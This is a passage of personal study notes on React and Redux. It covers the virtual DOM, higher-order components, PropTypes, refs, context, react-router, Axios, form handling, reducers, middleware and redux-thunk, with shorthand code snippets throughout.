How Reactjs Updates The Dom
See:
See:

The ReactJS render() method does _not_ render to the DOM. It edits a ReactJS internal (virtual) DOM. React compares the old virtual DOM to the new virtual DOM and diffs them. The virtual DOM is used because it is _faster_ than the real DOM. Accessing the real DOM is s-l-o-w!! If the diff of the VDOMs shows a difference, only then does React reach out to the real DOM and update it - and _only_ in the places where it changed; it does _not_ re-write the entire DOM.
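A toy version of the diffing idea - compare old and new virtual trees and emit only the patches that must touch the real DOM. This is vastly simplified compared to React's reconciler (no children, no keys), and the node/patch shapes are invented for illustration:

```javascript
// Diff two virtual nodes; return the minimal list of real-DOM operations.
function diff(oldNode, newNode, path = 'root') {
  if (oldNode.type !== newNode.type) {
    return [{ path, op: 'replace' }];          // different element type: replace wholesale
  }
  const patches = [];
  for (const key of Object.keys(newNode.props || {})) {
    if (oldNode.props[key] !== newNode.props[key]) {
      patches.push({ path, op: 'setProp', key, value: newNode.props[key] });
    }
  }
  return patches;
}

const oldTree = { type: 'button', props: { label: 'Save', disabled: false } };
const newTree = { type: 'button', props: { label: 'Save', disabled: true } };

const patches = diff(oldTree, newTree);
// Only the changed prop would reach the slow real DOM:
// patches -> [{ path: 'root', op: 'setProp', key: 'disabled', value: true }]
```

The whole-tree comparison happens on cheap JS objects; only the resulting patch list touches the expensive real DOM.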
Higher Order Components (HOCs)
A HOC wraps another component, possibly adding some logic to it etc., e.g., error handling. Convention is to name HOCs with a "With" at the beginning, e.g. "WithExtraInfo".

Create HOC method #1:
---------------------
Use for HOCs that modify the HTML of the component in some way - so you can place it inside your JSX. Do:

    import React from 'react';

    const withBlah = props => (
      <div className="blah">
        ... what ever extra components you want ...
        {props.children} <!-- <<<< This is what we're wrapping -->
        ... what ever extra components you want ...
      </div>
    );

    export default withBlah;

Then you use it in another component:

    import WithBlah from './withBlah';
    ...
    <WithBlah> ... </WithBlah>

Create HOC method #2:
---------------------
Use for HOCs that add behind-the-scenes logic like error handling. Do:

    import React from 'react';

    // Normal JS function
    const withBlah = (WrappedComponent, param1, param2, ...) => {
      //              ^
      //              Must start with a capital
      // From the normal JS function, return the React component function.
      return props => (
        <div className="blah">
          <WrappedComponent {...props}/>
          <!-- NOTE: You cannot use props={props} because the wrapped component would receive
               this as props.props, a child of its props object. Hence you have to use the
               spread operator as shown -->
        </div>
      );
    };

Then you use it to wrap a component in an export:

    ...
    export default withBlah(App, param1, param2, ...);
Prop Types
See

Allows us to specify which props the component accepts and their types.

    npm install --save prop-types

It is provided by the react team/community. It is not in react core, hence you have to npm install it. Then:

    import PropTypes from 'prop-types';

Then, after your component definition, whether functional or class based, add another property.

    class MyComponent { ... };

    // React will look for "propTypes" when in development mode and spit out warnings if the
    // prop types are violated.
    MyComponent.propTypes = { // Lower case "p" for "propTypes" is important
      // In here define the props that are used by your component and their types...
      // The keys will be your prop names and their values the types
      click: PropTypes.func, // You can even specify the function prototype!
      prop1: PropTypes.string,
      prop2: PropTypes.number,
      ...
    };

Can chain conditions. E.g.

    prop1: PropTypes.string.isRequired

Can also be applied to function components in exactly the same way.

Component children, i.e., `props.children`, should also be put into the propTypes spec:

    static propTypes = {
      children: PropTypes.oneOfType([
        PropTypes.arrayOf(PropTypes.node),
        PropTypes.node
      ]).isRequired
    }

(See)

Arrays of shapes:

    MyComponent.propTypes = {
      items: PropTypes.arrayOf(
        PropTypes.shape({
          code: PropTypes.string,
          id: PropTypes.number,
        })
      ),
    };

It seems one can kinda use PropTypes with contexts: Ref:

    const TestingContext = React.createContext("light");

    TestingContext.Provider.propTypes = {
      value: PropTypes.oneOf(["light", "dark"])
    };

    const Testing = () => (
      <TestingContext.Consumer>{value => <h1>{value}</h1>}</TestingContext.Consumer>
    );

    const App = () => (
      <div>
        <TestingContext.Provider value="light">
          <Testing />
        </TestingContext.Provider>
        <TestingContext.Provider value="dark">
          <Testing />
        </TestingContext.Provider>
        {/* PropTypes warning since value 'asdf' doesn't match the propTypes rule */}
        <TestingContext.Provider value="asdf">
          <Testing />
        </TestingContext.Provider>
        {/* default value used since it's not wrapped in a Provider */}
        <Testing />
      </div>
    );
Using React References
References give us access to our DOM elements.

IN CLASS BASED COMPONENTS
-------------------------
Can add a "ref" keyword to any component, including your own defined components. It gives you the ability to access an element in the DOM without having to use DOM selectors to find it. React magically ties your component class to the object in the DOM. You can use this to call DOM specific stuff like "focus()" for example.

Let's say you have a component:

    class MyComponent extends Component {
      constructor() {
        super(); // Must always call super()!!
        this.inputReference = React.createRef();
      }

      componentDidMount() {
        this.inputReference.current.focus();
        //                  ^^^^^^^ ^^^^^
        //                  ^^^^^^^ We can access the DOM function :)
        //                  ^^^^^^^
        //                  Must use the "current" property to get the current reference.
      }

      render() {
        <div>
          ...
          <input ref={this.inputReference} ... />
          ...
        </div>
      }
    };

IN FUNCTIONAL COMPONENTS
------------------------

    const myFuncComponent = props => {
      const elementRef = React.useRef(null);
      //    ^^^^
      //    elementRef will only be linked to the html_element when the return statement is
      //    executed. Therefore it can only be accessed after this. To do this, the useEffect()
      //    hook must be used, as this runs _after_ the component JSX has been rendered for the
      //    first time.

      useEffect( () => {
        elementRef.current.someDOMFunction(...);
        return () => {
          // This function is run to do cleanup work in useEffect()
        };
      }, []);
      // ^^
      // RECALL: the empty list means this only runs once when first rendered and _not_ on each
      // render!

      return (
        <div>
          <html_element ref={elementRef}>...</html_element>
        </div>
      );
    };
Context Api & Prop Chains
Good reads: - Note - if you see stuff with "childContextTypes" in it, it is the LEGACY API! Take care --------- Although the docs say that "Context is designed to share data that can be considered 'global' for a tree of React components ...", note that the 'global' data being shared is relatively STATIC, generally, as far as the child component is concerned - it won't update that data and cannot decide whether it should render based on changes in the context. This is why, for example, lifecyle methods haven't been expanded to see the previous context in the same way that one can see the previous props in functions like shouldComponenetUpdate() - i.e., the context doesn't appear to be designed to hold volatile state - obvs it might not be totally static, but just be aware. It's also NOT A GREAT WAY TO RESOLVE PROP DRILLING, for the same reson: when deciding when to re-render the context consumer cannot see the prevous context. The docs have this to say: "If you only want to avoid passing some props through many levels, component composition is often a simpler solution than context." VERY MUCH WORTH TAKING NOTE OF Class Based Components ----------------------- Prop chains are where a prop is passed down from component A to grand-...-grand-child component X via all the intermediate children, some or all of which may not care about the prop. React offers "contexts" to help tidy what might be a messy load of prop chains. You can create a context module. The course example is an authentication context. It is created in a folder named "context" in a file named "AuthContext". import React from 'react'; // The context is like a globally available JS object, just hidden inside the react "scope". // const authContext = React.createContext(...default-init-value...) 
// ^^^^^^^^^^^^^^^^^^ // Normally an object but can be a number, string etc const authContext = React.createContext({ authenticated: false, // Default values dont really matter, but makes IDE auto complete better login: () => {} }); export default authContext; So, now in your application or the most parentish component that will "own" the context: import 'AuthContext' from '../context/auth-context'; // AuthContext is used as a component that MUST WRAP ALL COMPONENTS THAT REQUIRED ACCESS TO IT. class App extends Component { render() { return <!-- -- NOTE here the AuthContext.Provider takes a value prop. That is why the defaults, generally, -- dont matter. Outer curlies to enter dynamic content v vInner curlies define the JS object vv --> <AuthContext.Provider value={{authenticated: this.state.authenticated}}> <div> ... All components that need access to the auth context ... </div> </AuthContext.Provider>; } } NOTE how the state is still managed by, in this case, the App component, not in the Authentication context. The reason for this is that React will only update when a state or prop changes, therefore, updating it in the context object would _not_ cause a re-render. Hence it is managed and updated by the app and just passed as a value to the context object. Then in components that want to use the authentication context we do the following. These components can be anywhere in the component hierachy and thats how we skip having to pass down props in trains. import AuthContext from '../../context/auth-context'; class SomeComponent extends Component { render() { return <AuthContext.Consumer> <!-- Return a function which the AuthContext can then call with the context as a parameter to said function. vvvvvvv --> {(context) => { return ... your componenet code ...; }} <!-- ^^^^ You dont have to wrap every component. 
You could wrap a subset of the components rendered if only they need the context --> </AuthContext.Consumer> } } The AuthContext.Consumer is quite clunky and only gives you access to the context in the JSX code and nowhere else. The alternative for class based components is this (React >= 16.6): class SomeComponent extends Component { static contextType = AuthContext; //^^^ ^^^^ //^^^ Must be spelt exactly like this! //Must be a static property // // Allows React to connect your component with this context behind the scenes componentDidMount() { this.context.login; //< Access the context with "this.context" which ReactJS creates for us } render() { return .. your JSX code {this.context.login ? <p>Logged in</p> : <p>Log in</p> } ... // ^^^^^^^^^^^^ // Can access it here too, without the wrapping consumer element. } } Functional Components --------------------- React hooks can do the same thing for us. Import the "useContext" hook. PropTypes For Contexts ---------------------- See the PropTypes section for an example of how this can be done. It seems okay but if the context is dynamic it is still hard to test it on a per-component basis.
Planning A React App
Steps: 1. Component Tree / Component structure 2. Application State (data) 3. Components vs Containers Recall: components are "dumb" - just presentational - and containers are stateful. Advice: separate high-level directories for components and containers with subdirectories for each component/container. Recall: component/container subfolders with a Capital first letter.
Http & Ajax
Fake online REST API for Testing and Prototyping: XMLHttpRequestObject -------------------- Oldest and best supported but I'm gonna ignore it. If a browser doesn't support the newer Fetch API I assume Axios is the best drop-in replacement. FETCH ----- This is the newer version of XMLHttpRequestObject that is much easier to use and works with promises and asynchronous functions: Given the workflow of CreateReactApp, the JS should be transpiled into JS that is also compatible with older browsers - I hope! AXIOS ----- 3rd party JavaScript library - a promise based HTTP client Given the workflow of CreateReactApp, the Axios JS will be transpiled into JS that is also compatible with older browsers! Happy days! npm install axios --save ^^^^^^ Makes it store an entry in the package.json file In a new component file "my-first-axios.js": import axios from 'axios'; const instance = axios.create({ baseURL: '' }); export default instance; // < Needed so other files can import this instance In an existing component that wants to use AJAX: import axios from '../path/to/my-first-axios'; ... some_handler = () => { ... probably set some "I am loading" state ... axios.post( '/endpoint relative to baseURL', javascript-object-repr-json ).then( response => { ... probably cancel "I am loading" state and update some components ... }).catch( error => { ... probably cancel "I am loading" state and update some components ... }); } Handle GET requests similarly using axios.get().
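The then/catch shape of that handler can be exercised without any network or axios install by standing in a resolved promise for the AJAX call. Everything here (`fakePost`, the endpoint, the response shape) is invented for illustration:

```javascript
// Stand-in for axios.post(): a resolved promise playing the role of an
// HTTP response, so the .then()/.catch() flow runs anywhere.
const fakePost = (url, body) =>
  Promise.resolve({ status: 200, data: { echoed: body } });

let loading = true; // the "I am loading" state from the notes

fakePost('/endpoint', { name: 'test' })
  .then((response) => {
    loading = false; // cancel "I am loading" state
    console.log(response.status, response.data.echoed.name); // 200 test
  })
  .catch((error) => {
    loading = false; // also cancel it on failure
    console.error(error);
  });
```

Swapping `fakePost` for a real axios instance keeps the handler body identical, which is the point of the pattern.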
Multi Page In Single Page App (Routing)
React core does not implement routing. A third party de facto standard package called react-router can be used. Routing - show different pages to user based on path in URL. Use JS to render different pages based on which path the user has navigated to. The router package helps parse the path to figure out where the user wants to go to. We then link these up to where we want to point the user. Server side, the same file is returned no matter what the path is - so the server has to be set up to do this. The paths are only significant on the CLIENT SIDE. INSTALLATION: npm install --save react-router react-router-dom Technically, only react-router-dom is required for web development. It wraps react-router and therefore uses it as a dependency. ENABLE: Do in index.js or App.js. In App.js wrap the App div inside "BrowserRouter". All children of the <BrowserRouter> tag will be able to access its routing functionalities: import React, {Component} from 'react'; import {BrowserRouter} from 'react-router-dom'; // << INCLUDE THIS class App extends Component { render() { return ( <BrowserRouter> <!-- << USE IT LIKE THIS --> <div> <!-- The app contents --> </div> </BrowserRouter> ); } } USE: In components/containers: Render small things ------------------- import {Route} from 'react-router-dom'; ... render() { <!-- Note how the Route tag is self closing --> <Route path="path for which this route should become active" render={some function to render for this path} /> <!-- For example: --> <Route path="/" exact <!-- << NOTE means the final slash is necessary to match - means "is my complete path like this?" vs "does my path start with this?" --> render={() => <div>A test</div>} /> <!-- Route more-or-less replaces itself with the content defined in render. You can even use multiple Routes for the same path --> } Render components ----------------- But if you want to RENDER A COMPONENT, use the component property like so: <Route path="..." 
[exact] component={Ref to function or class to use} /> Prevent reloads on link navigation: ----------------------------------- Reloading a page KILLS THE CURRENT APP STATE!! WE DO NOT WANT THIS To prevent links always re-rendering pages, i.e., reloading them, the links must be changed to look like this: Don't use <a>, use <Link>! The <a> tag... <a href="...">...</a> ... is replaced with a <Link> tag: <Link to="...">...</Link> ... or, more completely but with more complexity: <Link to={{ pathname: '/something' <!-- NOTE: This is always treated as an ABSOLUTE path... --> hash: '#something' <!-- ...whether or not it has a prefix of '/' --> search: '?arg=param' }}>...</Link> This allows React to intercept the link click and, instead of the page being loaded fresh, it can just render what changes are needed WITHOUT having to reload the page. Note that the link pathname is always treated as an absolute path, so if you want to use a relative path you have to build it up into an absolute one by using the page you are currently on, given by "this.props.match.url", and appending the target: e.g., pathname: this.props.match.url + "/relative/path"; If you want to add some styling to the active and non-active links it is better to use <NavLink>. This adds an "active" class to the active link for you. Note there can be many "active" links if more than one Link path matches. The reason for this is that the link path is TREATED AS A PREFIX (just like in Router). So to match exactly use the exact attribute. <NavLink to={{ pathname: '/something' <!-- << This is always treated as an ABSOLUTE ... --> }} [exact] <!-- ... path whether or not it has a prefix of '/' --> >...</NavLink> <!-- << NOTE that routes are used in the order they are defined, so "/something" will match before ":id", but remember ALL ROUTES ARE RENDERED IF THEY MATCH THE PATH --> <Route path="/:id" exact component={...}/> To pass route parameters via our links just do something like <Link to={'/path/' + this.props.id}> ... 
child elements or text ... </Link> To get the value of "id" in the component we need to access the magic props attributes that Router added for us: match.params['id'] // It is called "id" as that was the name in the Route:path definition Can also use match.params.id Remember that ALL the Routes that match the path will be rendered. If you want only ONE match to be rendered (the one that is seen first btw), then use <Switch> to wrap the <Route> tags: <Switch> <Route .../> ... <Route .../> </Switch> Search Parameters ----------------- These are not the route parameters which come from the _path_ in the URL. These are the query parameters that occur at the end of the URL after a "?". For example: Pass in links using <Link to=""/> Or <Link to="" search="?my_value=123"/> Can then access using props.location.search To parse the search string easily use: const query = new URLSearchParams(this.props.location.search); for (let param of query.entries()) { console.log(param); } URLSearchParams is a built-in object, shipping with vanilla JavaScript Navigating Programmatically --------------------------- To navigate to a page: props.history.push({pathname: "/my/link/path"}); or props.history.push("/my/link/path"); Nested Routing -------------- Load a component inside another component which is also loaded via routing - you can use the <Route> component wherever you want, as long as the page is a child, grandchild etc of the <BrowserRouter> component. WARNING: nested <Route>s do not resolve relative to their parent route. For example, if the parent was "/pull-requests" and the URL was "/pull-requests/1/" and the child route is "/:id", this does not resolve to "/pull-requests/:id"! To solve this in nested routes, get the current path DYNAMICALLY: <Route path={this.props.match.url + '/:id'} /> WARNING: React router does not always _replace_ the component so it won't always re-render the component. The lifecycle hook componentDidMount() won't get called. 
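Since URLSearchParams is built in, the search-string parsing above can be tried outside React entirely; the query string here is made up, standing in for this.props.location.search:

```javascript
// URLSearchParams ships with vanilla JavaScript (browsers and Node alike).
const search = '?my_value=123&page=2'; // plays the role of props.location.search

const query = new URLSearchParams(search);

// Individual values come back as strings, or null when the key is absent.
console.log(query.get('my_value')); // 123
console.log(query.get('missing')); // null

// Iterate every key/value pair, as in the notes' for...of loop.
for (const [key, value] of query.entries()) {
  console.log(key, '=', value);
}
```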
But what will be called is componentDidUpdate() so this will also need to be implemented. But be careful - the decision as to whether to re-render must avoid infinite loops! Redirecting Requests -------------------- Rather than having multiple paths to render the same content, you can use the special Redirect component from react-router-dom: <Switch> ... <Redirect from="/" to="/pull-requests"/> <!-- Can only use "from" inside a Switch --> </Switch> Redirect doesn't render content - it redirects the URL which can then be caught by another route and then rendered by the actual route. So as soon as it is "rendered" the page URL will be changed, regardless of any other components that would otherwise have been rendered after it. E.g., <Redirect to="/pull-requests"/> <!-- No "from" allowed outside of a <Switch> --> <p>Some text</p> <!-- Will not be rendered because of redirect --> Such redirects can be used conditionally using normal JS. E.g.: const redirect = some-condition ? <Redirect to="..."/> : null; <div> {redirect} ... some content ... </div> Sometimes, if you want to push a new page onto the history stack (redirect _replaces_ the top of the stack) to maintain navigability, use `props.history.push(url)` instead. Guards ------ Ways to stop pages being navigated to if they should not be accessible - e.g. because they require the user to have authenticated (logged in). Just use JavaScript! {this.state.auth ? <Route ... /> : null} ^^^^^ If definition isn't rendered then this route does not exist. Handle Unknown Routes - 404 --------------------------- Make the _last_ Route in your Switch <Route render={() => <h1>Not Found</h1>} /> Lazy Loading ------------ NOTE: requires react-router >= 4 & create-react-app (Webpack config required) For big apps we don't want to download *all* the app code... only code that will be needed. So, for pages etc that are seldom likely to be visited or components seldom used, we only want to download their code on demand, not "up front". 
Lazy loading, a.k.a. "code splitting", is the way to address this. To do this you need to create a HOC "asyncComponent" - left this for now... come back to it if I ever need it. BUT - if React >= 16.6 you can use React Suspense to do this for you :D React Suspense adds a new method, React.lazy(), that you can use to do lazy loading!
Form Validation
For inputs, when adding an "onChange" event handler remember two way binding! You have to modify your state so that the changes made will be rendered. The submit button does not need to have its "onClick" property used. The form JSX tag has an "onSubmit" property which can be used to supply a validator function reference that guards form submission. IMPORTANT - In the submission event handler remember to use event.preventDefault(), otherwise form submission reloads the page!
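The submit-handler pattern can be exercised outside a browser with a fake event object; the non-empty-name validation rule and the event stub below are both invented for illustration:

```javascript
// Fake event object mimicking the one the browser passes to onSubmit,
// just enough to observe whether preventDefault() was called.
const makeEvent = () => {
  const e = { defaultPrevented: false };
  e.preventDefault = () => { e.defaultPrevented = true; };
  return e;
};

// Stand-in for component state fed by two-way-bound inputs.
const state = { name: '' };

const submitHandler = (event) => {
  event.preventDefault(); // stop the browser reloading the page!
  const valid = state.name.trim().length > 0; // hypothetical validation rule
  return valid;
};

const event = makeEvent();
console.log(submitHandler(event), event.defaultPrevented); // false true
```

The key point is that preventDefault() runs unconditionally, before any validation outcome, so the page never reloads.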
Redux
See: Redux - 3rd party library. Most often associated with React but not part of React. It is independent. One of the benefits of Redux is that it makes state changes predictable and transparent. Every time an action is dispatched, the new state is computed and saved. The state cannot change by itself, it can only change as a consequence of a specific action. -- From redux online docs It provides a _clearly defined process_ on how the _state in some central store_ can change. It provides a GLOBAL STATE across the entire app, that ALL components/containers can access in a well defined way. Why not just globals? From this post (): It's important to remember why we consider global variables bad: because anything can change them at any time and you won't know why during debugging ... Redux solves the visibility problem really well by introducing an event driven paradigm to state. ... ... the restriction of sending typed actions and then doing work explicitly designed with reducers (instead of having business logic scattered all over the place inside components) ... ... Use redux for what's really global and for everything else I would keep state as close as possible to where it is used. Why not just globals, from this post ()? Lots of reasons: - Isolation of "write logic" means you know where to look to see what code is updating a given chunk of state - Consistent state handling means it's a lot easier to think about what's going on in the application - The DevTools show you a log of dispatched actions, and enable you to step back and forth between states to see what the UI looked like at each point - Middleware lets you centralize app-wide logic, such as consistent transformations for AJAX responses - Redux's constraints (such as wanting state to be serializable) enable a number of other use cases, such as persisting state across page reloads and synchronizing multiple stores remotely. 
- There's a rapidly growing ecosystem of addons and utilities for specific use cases (see ) - I use time-travel debugging on a daily basis, and it's a _huge_ time-saver for me.

                   +---> Reducer -----+
                   :                  :
                   :                  :
                   +---> Reducer -----+-----> ROOT reducer
                   |                  |                  |
    Action ------> MiddleWare --------+---> Reducer -----+
       ^                                                 | [Updates]
       | [Dispatches]                                    v
    Component                                     Central Store
       ^                                                 |
       | [Passes updated state]                          | [Triggers]
       |                                                 |
       +------------ Subscription <----------------------+

Redux provides a central store, which is the ENTIRE APPLICATION STATE. Most often this will be things like the authenticated state of the user, for example. Actions are a way for a component to tell Redux "I'd like to change the state... here is the plan on how to do that". They are just a pre-defined informational package, with an optional payload, that tells Redux about the plan. This is the PUBLISH, a.k.a. DISPATCHING AN ACTION. Reducers receive actions and handle the update of the central store. The reducers must be completely SYNCHRONOUS and have NO SIDE EFFECTS. If there are multiple reducers, they are, in the end, merged into one single reducer, which is what gets to modify the central store. Once the central store is updated it informs all its SUBSCRIBERS of the state change, passing the updated state, as props, to its subscribers. Install Redux in the usual manner: npm install --save redux REDUCER: Gets: State, Action. Returns: Updated state. But the original state must NOT be mutated! Just like with the setState() func. NEVER mutate any data! const rootReducer = (currentState = initialState, action) => { // ^^^^^^^^^^^^ // Useful because when the reducer is created it won't be passed a state if (action.type == ...) { ... do something for this type } else if (action.type == ...) { ... } // and so on... return new_state; // new_state must COPY from state. state must NOT be mutated } STORE: Created with a root reducer. 
const createStore = redux.createStore; const store = createStore(rootReducer); let currentState = store.getState(); ACTION: Just access the store and call dispatch(). The func takes an action as its arg - a JS object that MUST have a "type" property so that we know what type of action was dispatched and what should be done in the reducer. store.dispatch({ type: 'CONVENTION_IS_SHORT_UPPER_CASE_DESCRIPTION', value-name-of-choice: value-data, more-values: more-data, ... ... }); SUBSCRIPTION: Informs us when something changed and we need to re-get the state. Use: store.subscribe(function-executed-whenever-state-updates); store.subscribe( () => { // Subscribe func gets NO args ... store.getState(); ... }); Using Redux With React ---------------------- Must install react-redux to "hook up" redux stores to the react application: npm install --save react-redux The Redux store should be created before or when our App starts - use `index.js`! import { createStore } from 'redux'; import { Provider } from 'react-redux'; //NOTE: Must WRAP the app with <Provider> import reducer from './store/reducer'; // Generally may have many complex Reducers // so these will be stored in their own files in their // own folders in our app. Perhaps a "store" folder next // to the containers and components folders. const store = createStore(reducer); // Define in separate file, reducer.js // NOTE: Must WRAP the app with <Provider> ReactDOM.render(<Provider store={store}><App /></Provider>, ...); // ^^^^^^^^^^^^^^^^^^^^^^^ // Wrap app with Provider, which provides our store - "injects" our store into the // React components in the app. registerServiceWorker(); In reducer.js - - - - - - - const initialState = { ... }; const reducer = (state = initialState, action) => { // your actions here or just return state if nothing should change. if (action.type == 'ACTION_TYPE') { return { // Immutably created new state }; } ... ... return state; // LAST RETURN handles unrecognised actions and returns state unchanged. 
// Or use switch (action.type) { case 'BLAH': break/return; ... default: return state; } }; export default reducer; In the reducer you can replace the if-else blocks with a switch statement: switch(action.type) { case 'SOME_TYPE_1': return { new_state_member: new_value, ... } case 'SOME_TYPE_2': return { ... } ... } WARNING WARNING WARNING: The state returned from the reducer is, unlike in React, NOT merged with the existing state. It just becomes the state. This means YOU HAVE TO DO THE MERGE YOURSELF by DEEP copying the existing state (the current state is IMMUTABLE) and modifying the copy as appropriate. In components that require access to the store: - - - - - - - - - - - - - - - - - - - - - - - - - import { connect } from 'react-redux'; class MyComponent ... { ... render() { ... <!-- Here we can access redux state mapped to our props as defined below --> <eg_element clicked={this.props.onSomeEvent}>{this.props.a_props_attribute}</eg_element> // ^^^^^ ^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^ // ^^^^^ ^^^^^^^^^^^ From mapStateToProps // ^^^^^ From mapDispatchToProps // ^^^^^ // NOTE HOW WHAT WAS THE STATE IS NOW ACCESSED AS PROPS! ... } } // How state, managed by redux, should be mapped to props that can be accessed in this component. // The state parameter is the state as set up in reducer.js so it will have those properties. const mapStateToProps = state => { // Func that expects the state, stored in redux, and returns a map return { a_props_attribute: state.some_state_var // ^^^^^ // The state passed into the function, which is the state provided by redux! ... ... }; } // Which actions the container will DISPATCH const mapDispatchToProps = dispatch => { return { onSomeEvent: (param1) => dispatch({type: 'ACTION_TYPE', actionParam1: param1, ...}), ... 
}; }; // `connect` returns a new function that accepts the component to wrap: // Either export default connect(mapStateToProps)(MyComponent); // Connect is a func that _returns_ a HOC // Or export default connect(mapStateToProps, mapDispatchToProps)(MyComponent); // Connect is a func that _returns_ a HOC Updating state IMMUTABLY ------------------------ The state object passed into a reducer MUST NOT BE MODIFIED. So doing the following is WRONG: let newState = state; newState.something += 101; // WARNING - just MUTATED the state! return newState; Instead you MUST COPY THEN MODIFY the COPY of state: let newState = Object.assign({}, state); // SHALLOW clones object OR let newState = {...state, something: state.something + 101 }; // Still a SHALLOW clone! CAUTION: With SHALLOW copies you cannot update any reference types in the copy. SEE SEE SEE: Updating Arrays IMMUTABLY ------------------------- I was doing it by copying the array (with the spread operator, for example) and then doing a splice(). Another method is to use the Array.filter() method as filter returns a NEW array. E.g., to delete a particular index in an array in a react state, as we need to copy the array before modifying it, rather than doing it manually, we can do it using filter: newArrayWithDeletedItem = state.member.filter( (arrayItem, itemIndexInArray) => itemIndexInArray != itemIndexToDelete ); SEE SEE SEE: Using Multiple Reducers ----------------------- In `index.js`: ... import { createStore, combineReducers } from 'redux'; // ^^^^^^^^^^^^^^^ // Need this extra new import; Combines the states of all sub-reducers into // ONE state - there is really only one root reducer, with the one state // that combines the sub-states of all the sub-reducers. (But note the // warning below: each sub-reducer only sees its own slice!) ... import myFirstReducer from '...'; import mySecondReducer from '...'; ... ... 
// Construct the root reducer const rootReducer = combineReducers({ appAreaName1 : myFirstReducer, appAreaName2 : mySecondReducer, // ^^^^^^^^^^^ // These names give us access to the sub-states in our app. In our app, to access these sub-states // we must do const // mapStateToProps = state => { // return { // a_props_attribute: state.appAreaName1.some_state_var // ^^^^^^^^^^^^ // NOTE extra layer of nesting in state // ... // }; // } ... }); const store = createStore(rootReducer); // ^^^^^^^^^^^ // NOTE: Now the ROOT reducer is passed in, as in Redux there is really // only ONE reducer. ... ReactDOM.render(<Provider store={store}><App/></Provider>); BUT WARNING WARNING WARNING: The sub-reducers can NO LONGER ACCESS THE GLOBAL REDUCER STATE!!! They cannot "see" the state in the other sub-reducers. Thus, if they need state from another reducer they SHOULD RECEIVE IT AS PART OF THE ACTION PAYLOAD INSTEAD. You CAN MIX Redux With Local React State ---------------------------------------- You CAN use redux and still have local state in a component and use React's setState(). For example, local UI state, like whether a modal should be displayed etc, is usually more appropriately stored as local state and NOT in redux. Local state can then be passed to Redux actions if it is required by other parts of the app. Middleware ---------- SEE: Middleware provides a third-party extension point between dispatching an action and the moment it reaches the reducer. // This whole set of nested functions (function tree) IS a middleware! // Redux will call this middleware function and pass it the store! // vvvvv const myMiddleWare = store => { // The middleware function returns a function. This function lets the action continue on its // journey to a reducer. This function will also, eventually, be executed by redux. return next => { // Return yet another function that receives the action that was dispatched as its parameter return action => { // Here we can access store, next and action. 
// This code is run in between the action and the reducer. const result = next(action); //<<< Lets the action continue to the reducer ... return result; }; }; }; To use the middleware we must import applyMiddleware from Redux: import { createStore, combineReducers, applyMiddleware } from 'redux'; // ^^^^^^^^^^^^^^^ ... const store = createStore(rootReducer, applyMiddleware(myMiddleWare, ...)); // ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ // NEW second argument here applies an "enhancer" to the // store, which in this case is our middleware. // The function applyMiddleware accepts a list of middlewares // that will get executed in order. Redux DevTools --------------- Help debug the store! Asynchronous Code and Redux Using Redux-Thunk --------------------------------------------- RECALL: REDUCERS CAN **NOT** RUN ASYNCHRONOUS CODE! This is because the reducer returns immediately, so whatever state modifications are dependent on the async code can't be communicated back to react via this reducer - the reducer would finish before the async result was ready! USE ACTION CREATORS to overcome this problem. Action creators can be good for both sync and async code. For sync code they make the action object creation centralised into one function that accepts arguments, rather than having the action object potentially created in many places. E.g.: // This is a SYNC action creator export const MY_ACTION = "MY_ACTION"; export const myAction = (payload) => { return { type: MY_ACTION, payload: payload, ... }; }; // And we use it in our Redux component's mapDispatchToProps like so. const mapDispatchToProps = dispatch => { return { // onSomeEvent is NO LONGER LIKE BELOW // onSomeEvent: (param1) => dispatch({type: 'ACTION_TYPE', actionParam1: param1, ...}), // // It is now written like onSomeEvent: (param1) => dispatch(myAction(param1)), // ^^^^^^^^^^ // The action creator function returns, synchronously, the action // rather than creating the object in each instance the // action is created - more DRY! ... 
}; }; Thunk allows the action creators to, instead of returning an action object, return a function that will eventually dispatch an action. The "eventually dispatch" means that this ENABLES ASYNC CODE. DO: npm install --save redux-thunk In your app you now add: import { createStore, combineReducers, applyMiddleware, compose } from 'redux'; // NEW vvvvv import thunk from 'redux-thunk'; ... const store = createStore(rootReducer, applyMiddleware(myMiddleWare, thunk)); // ^^^^^ // Thunk added to the list of middleware added to our app's store. Then create the ASYNC action creator as follows: In action creators, no longer return the action, but RETURN A FUNCTION that will EVENTUALLY DISPATCH AN ACTION! E.g., with the myAction action creator from above: export const myAction = (payload) => { return { type: MY_ACTION, payload: payload, ... }; }; BECOMES export const myActionSync = (payload) => { return { type: MY_ACTION, payload: payload, ... }; }; export const myActionAsync = (payload) => { // Can pass getState - but it is optional... we don't have to use it. // It can be called to retrieve the current state, if we need to use it. // This is the state PRIOR to us re-dispatching the action. // vvvvvvvv return function(dispatch[, getState]) { setTimeout( () => { dispatch(myActionSync(payload)) // ^^^^^^^^^^^^ // NOTE must call the sync action, not the async version, otherwise we create an infinite loop! }, 2000); }; }; This works because in our React component we have: const mapDispatchToProps = dispatch => { return { onSomeEvent: (param1) => dispatch(myActionAsync(param1)), // ^^^^^^^^^^^^^ // NOTE the action creator is now the async version... ... Because the action creator now returns a function, the thunk middleware detects this when the action is dispatched and DELAYS the action, by calling our function, through which we can do something asynchronously, and then call the real, non-delayed, Redux dispatch method, which will make it to the reducer, when we are ready. 
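The whole dispatch → middleware → reducer loop above can be sanity-checked with a dependency-free sketch: a toy store whose dispatch is wrapped by a hand-rolled thunk-style check. The store implementation, action name, and the immediate (rather than setTimeout-delayed) dispatch are all illustrative simplifications, not redux or redux-thunk themselves:

```javascript
// Toy store: just enough of createStore to show dispatch -> reducer -> state.
function createMiniStore(reducer) {
  let state = reducer(undefined, { type: '@@INIT' }); // init via default param
  return {
    getState: () => state,
    dispatch: (action) => { state = reducer(state, action); },
  };
}

const MY_ACTION = 'MY_ACTION';

// Reducer: synchronous, no side effects, never mutates the incoming state.
const reducer = (state = { payload: null }, action) =>
  action.type === MY_ACTION ? { ...state, payload: action.payload } : state;

const store = createMiniStore(reducer);

// Hand-rolled version of what redux-thunk's middleware does: if the
// dispatched "action" is a function, call it with dispatch instead of
// letting it continue to the reducer.
const thunkish = (store) => (next) => (action) =>
  typeof action === 'function' ? action(next) : next(action);

// applyMiddleware essentially performs this wrapping for you:
store.dispatch = thunkish(store)(store.dispatch);

// Sync action creator.
const myActionSync = (payload) => ({ type: MY_ACTION, payload });

// "Async" action creator: returns a function that eventually dispatches.
// (A real one would put setTimeout / an AJAX call around the dispatch.)
const myActionAsync = (payload) => (dispatch) => {
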